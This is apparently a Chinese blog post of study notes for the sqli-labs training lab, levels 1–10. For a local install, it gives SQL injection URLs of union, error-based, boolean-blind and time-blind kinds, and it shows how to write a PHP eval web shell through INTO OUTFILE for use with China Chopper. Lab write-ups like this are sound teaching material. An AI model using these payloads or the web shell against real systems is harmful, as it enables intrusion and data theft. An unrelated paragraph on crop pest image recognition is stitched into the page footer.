Sqli-labs 学习笔记 Less 1-10

1.这边使用的phpstudy搭建环境,将源码复制到phpstudy目录中的www文件夹中,源码可以从github下载

这里是源码地址:https://github.com/Audi-1/sqli-labs

下图为源码文件放的位置

php版本建议5.4以上,这样没有魔术引号

下面只是单纯的爆数据库,想要爆出用户名和密码的话继续使用查询语句查询就行

Less 1

http://127.0.0.1/sqli-labs-master/Less-1/?id=1
//这里是less 1的url

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
//尝试用单引号闭合试试是否报错,这里显示报错

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+
//使用 order by 判断字段数,这边显示3个字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' union select 1,2,3 --+
//使用union联合查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() --+
//直接爆出数据库

 

Less 2

http://127.0.0.1/sqli-labs-master/Less-2/?id=1
//这里是Less 2的url

http://127.0.0.1/sqli-labs-master/Less-2/?id=1-0
//用/报错和-0显示正常判断出此处有数值型注入

http://127.0.0.1/sqli-labs-master/Less-2/?id=1-0 union select 1,2,database() --+
//一样使用union联合查询爆出数据库

Less 3

http://127.0.0.1/sqli-labs-master/Less-3/?id=1
//这里是Less 3的url

http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+
//使用单号加注释,发现还是报错

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+
//这边加个括号发现回显正常,说明这里有字符型注入,判断是使用('')闭合字符串

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,database() --+
//继续用union联合爆出数据库

Less 4

这里与第三关类型,只是单引号变成了双引号,原理是一样的

Less 5

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'
//这边用单引号发现报错,用双引号发现页面返回正常,判断是单引号闭合,用联合查询发现这里没有数据回显,所以这边使用显错注入

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
//直接爆出数据库名

Less 6

这里和第五关一样,单引号闭合变为双引号闭合,同样使用显错注入爆出数据库

Less 7

http://127.0.0.1/sqli-labs-master/Less-7/?id=1'))--+
//经过多次测试发现这里是((''))闭合字符串,因为没有报错信息所以这边用不了显错注入
我们可以尝试写入文件

这里可以用@@basedir和@@datadir查看数据库安装路径和数据库路径,接着上传一句话

union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile"路径"

通过菜刀连接

Less 8

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+
//这里发现是单引号字符型注入,这里也尝试了一些boole盲注发现也可以

http://127.0.0.1/sqli-labs-master/Less-8/?id=2' union select 1,2,3 into outfile "D:\\phpStudy\\WWW\\1.php"--+
//尝试了一下上传文件发现上传成功,说明有file权限,这样就可以上传一句话用菜刀连接了

当然还有另一种方法,这里发现boole盲注也可以,我们可以利用boole盲注一个字符一个字符爆出数据库

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8 --+
//这里通过bool盲注判断数据库名长度,这里是8

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),1,1))>115 --+
//这里是判断数据库的第一个字符ascii值是否大于115

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),1,1))=115 --+
//经过测试发现第一个字符ascii码为115,查询ascii表发现是s
以此类推可以爆出所有字符

Less 9

尝试使用单引号闭合和双引号闭合发现回显都是正常的

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) --+
//经过多次尝试这里是单引号闭合的时间盲注

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if (ascii(substr(database(),1,1))>155,1,sleep(10)) --+
//判断数据库名的第一个字符ascii值是否大于155,如果大于155,页面立即响应,反之延迟10秒后响应
这样一个一个测出数据库名

Less 10

这里和第9关差不多

http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(10)--+
//双引号闭合的时间盲注

http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and if (ascii(substr(database(),1,1))>155,1,sleep(10)) --+
//同样的判断第一个字符ascii值

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
图像识别技术在病虫害检测中的应用是一个快速发展的领域,它结合了计算机视觉和机器学习算法来自动识别和分类植物上的病虫害。以下是这一技术的一些关键步骤和组成部分: 1. **数据收集**:首先需要收集大量的植物图像数据,这些数据包括健康植物的图像以及受不同病虫害影响的植物图像。 2. **图像预处理**:对收集到的图像进行处理,以提高后续分析的准确性。这可能包括调整亮度、对比度、去噪、裁剪、缩放等。 3. **特征提取**:从图像中提取有助于识别病虫害的特征。这些特征可能包括颜色、纹理、形状、边缘等。 4. **模型训练**:使用机器学习算法(如支持向量机、随机森林、卷积神经网络等)来训练模型。训练过程中,算法会学习如何根据提取的特征来识别不同的病虫害。 5. **模型验证和测试**:在独立的测试集上验证模型的性能,以确保其准确性和泛化能力。 6. **部署和应用**:将训练好的模型部署到实际的病虫害检测系统中,可以是移动应用、网页服务或集成到智能农业设备中。 7. **实时监测**:在实际应用中,系统可以实时接收植物图像,并快速给出病虫害的检测结果。 8. **持续学习**:随着时间的推移,系统可以不断学习新的病虫害样本,以提高其识别能力。 9. **用户界面**:为了方便用户使用,通常会有一个用户友好的界面,显示检测结果,并提供进一步的指导或建议。 这项技术的优势在于它可以快速、准确地识别出病虫害,甚至在早期阶段就能发现问题,从而及时采取措施。此外,它还可以减少对化学农药的依赖,支持可持续农业发展。随着技术的不断进步,图像识别在病虫害检测中的应用将越来越广泛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值